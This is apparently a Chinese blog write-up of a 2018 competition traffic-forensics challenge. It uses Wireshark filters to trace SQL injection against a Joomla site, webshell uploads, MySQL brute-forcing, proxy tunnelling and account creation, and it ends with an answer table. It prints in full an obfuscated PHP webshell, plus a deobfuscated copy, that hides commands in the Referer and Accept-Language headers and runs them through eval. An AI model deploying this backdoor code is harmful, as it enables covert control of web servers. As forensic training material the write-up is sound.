2018信息安全铁人三项第三赛区数据赛wp(5.5)
2018信息安全铁人三项第三赛区数据赛
题目描述
1.黑客攻击的第一个受害主机的网卡IP地址
2.黑客对URL的哪一个参数实施了SQL注入
3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)
4.第一个受害主机网站数据库的名字
5.Joomla后台管理员的密码是多少
6.黑客第一次获得的php木马的密码是什么
7.黑客第二次上传php木马是什么时间
8.第二次上传的木马通过HTTP协议中的哪个头传递数据
9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
10.php代理第一次被使用时最先连接了哪个IP地址
11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
12.黑客在内网主机中添加的用户名和密码是多少
13.黑客从内网服务器中下载下来的文件名
注:流量包1(1-5题),流量包2(6-8题),流量包4(9、10题),流量包9(11-13题)
详细解题步骤:
1.黑客攻击的第一个受害主机的网卡IP地址
过滤http流,上来发现一个202开头的ip向192开头的ip发送包,我们此时并不能确定,这里可以跳过第一题,直接做第二题,确定黑客ip,即可确认受害主机IP
2.黑客对URL的哪一个参数实施了SQL注入
了解sql注入的话,可以输入关键字进行查找,这里我输入了select
时间直接调到了149左右,往下继续翻发现这一大串都是在进行SQL注入,我们可以对其中一条进行url解码进行确认
我拿第二条进行解码,如下图
非常明显了,这里我可以确认是在进行sql注入,因此,发送IP即为黑客IP,接收IP即为受害主机IP,并且确认了黑客对list[select]参数进行SQL注入
3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_)
这里我有点投机取巧了,了解SQL注入的话直接去最后找信息,因为我发现中间是盲注,所以你在中间找太费功夫,最后几条查看数据库信息需要库名和表名,再加上它针对的是一个受害者主机,我猜测它最后的表即为我这里需要的答案,对SQL注入最后一条进行url解码(注意是否是本次SQL注入的流量)
ajtuc_users即为我所需要找到的表名,这里只需要提交前缀
4.第一个受害主机网站数据库的名字
解第三题顺便把第四题也解了,上图括起来的是库名.表名
这样是不是就清晰明了了
百度得知Joomla!是一套内容管理系统。 使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。
5.Joomla后台管理员的密码是多少
6.黑客第一次获得的php木马的密码是什么
这里我们筛选post请求,关键字查找eval
http.request.method == "POST"
发现PHP文件,并且看到了菜刀流量的特征,因此判断key值即为php木马的密码
7.黑客第二次上传php木马是什么时间
再次进行详细的筛选,筛选与此php相关的所有post请求
(http.request.method == "POST") && (_ws.col.info == "POST /kkkaaa.php HTTP/1.1 (application/x-www-form-urlencoded)")
这里我们要先找到哪几个是第二次上传木马的包
前三个的木马密码都是zzz,后两个的木马密码为zz,猜测后两个是第二个木马上传的包,但这只是猜测,还是要验证一下
z2的值很明显是hex类型,复制到winhex后,发现对应的Unicode是一段混淆后的php
得到了下面的php内容
<?php
$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';
$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>';
$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';
$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';
$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';
$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';
$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';
$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';
$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');
$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';
$g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';
$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';
$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';
$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';
$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N=$j('',$x);$N();
?>
反混淆及美化后如下所示(太难为我了,不会啊):
<?php
$kh="cb42";
$kf="e130";
function x($t,$k)
{
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}
return $o;
}
$r=$_SERVER;
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
if($rr&&$ra){
$u=parse_url($rr);
parse_str($u["query"],$q);
$q=array_values($q);
preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
if($q&&$m){
@session_start();
$s=&$_SESSION;
$ss="substr";
$sl="strtolower";
$i=$m[1][0].$m[1][1];
$h=$sl($ss(md5($i.$kh),0,3));
$f=$sl($ss(md5($i.$kf),0,3));
$p="";
for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];
if(strpos($p,$h)===0){
$s[$i]="";
$p=$ss($p,3);
}
if(array_key_exists($i,$s)){
$s[$i].=$p;
$e=strpos($s[$i],$f);
if($e){
$k=$kh.$kf;
ob_start();
@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
$o=ob_get_contents();
ob_end_clean();
$d=base64_encode(x(gzcompress($o),$k));
print("<$k>$d</$k>");
@session_destroy();
}
}
}
}
?>
因此可以确认这两个包就是第二次在上传木马
确定传马时间:17:20:44.248365000
8.第二次上传的木马通过HTTP协议中的哪个头传递数据
那我们先来确定一下第二次上传的木马叫什么,base64解密z1值得到文件名为footer.php
那就在http流里面查找关键字footer.php
这里看到了所有的文件头消息,发现是通过HTTP协议中的Referer头传递数据
9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
跟mysql相关,那就搜索mysql协议呗,第三个数据包里面没有相关的,在第四个数据包找到了
翻了一下,发现在对数据库的登录进行爆破,猜测在爆破成功时结束爆破,所以直接翻到爆破的最后一条,返现返回包是ok,说明发送包里面含有正确的数据库的登录信息,可以看到用户名和hash后的密码
10.php代理第一次被使用时最先连接了哪个IP地址
注:流量包4-6均可查到,但因为题干要求是第一次代理,所以还是从流量包4入手
(http.request.method == POST and ip.addr == 202.1.1.2 ) && !(_ws.col.info == "POST /tmp/tunnel.php?cmd=read HTTP/1.1 ")
这里过滤了post请求以及过滤源地址是黑客的地址,后面我还加上了把只读取的过滤不显示
按照时间排序,第一次连接的ip是4.2.2.2,端口为53
11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
那么我们要先找到什么时候发生了黑客第一次获取到当前目录下的文件列表的漏洞利用请求,经过多次的过滤尝试,终于找到了最佳的过滤条件,在流量包6-8均有相关的流量,但没有达到条件,不是我们所需要的请求
http.request.uri.path == "/install/index.php"
ls都不用看,没查到,dir总共执行两次,第二次成功了,查看其tcp流,如下图
可以发现执行成功,那么其时间即为我们所需的答案
12.黑客在内网主机中添加的用户名和密码是多少
上图中发现一条流量是菜刀连接
更改过滤条件,查看目的地址为服务器192.168.2.20的http流量:http && ip.dst == 192.168.2.20
这下面都是菜刀连接包,一条条查看
终于找到了,net user 用户名 密码 /add此命令会添加账户
因此确定用户名和密码
13.黑客从内网服务器中下载下来的文件名
最后一个我还真没想到,需要进行拼接
倒数第四条执行了某个exe,其后面两条进入了某个目录下,最后一条如下
以为这个是答案,结果只是一部分
跳过两个字节,得到后面一部分,拼接得到文件名
答案列表
| 题目 | 答案 |
|---|---|
| 1.黑客攻击的第一个受害主机的网卡IP地址 | 192.168.1.8 |
| 2.黑客对URL的哪一个参数实施了SQL注入 | list[select] |
| 3.第一个受害主机网站数据库的表前缀(加上下划线 例如abc_) | ajtuc_ |
| 4.第一个受害主机网站数据库的名字 | joomla |
| 5.Joomla后台管理员的密码是多少 | |
| 6.黑客第一次获得的php木马的密码是什么 | zzz |
| 7.黑客第二次上传php木马是什么时间 | 17:20:44.248365000 |
| 8.第二次上传的木马通过HTTP协议中的哪个头传递数据 | Referer |
| 9.内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash) | 1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4 |
| 10.php代理第一次被使用时最先连接了哪个IP地址 | 4.2.2.2 |
| 11.黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候 | 18:36:59.770782000 |
| 12.黑客在内网主机中添加的用户名和密码是多少 | kaka kaka |
| 13.黑客从内网服务器中下载下来的文件名 | lsass.exe_180208_185247.dmp |
本文来自博客园,作者:kriton,转载请注明原文链接:https://www.cnblogs.com/kriton/articles/18606902
浙公网安备 33010602011771号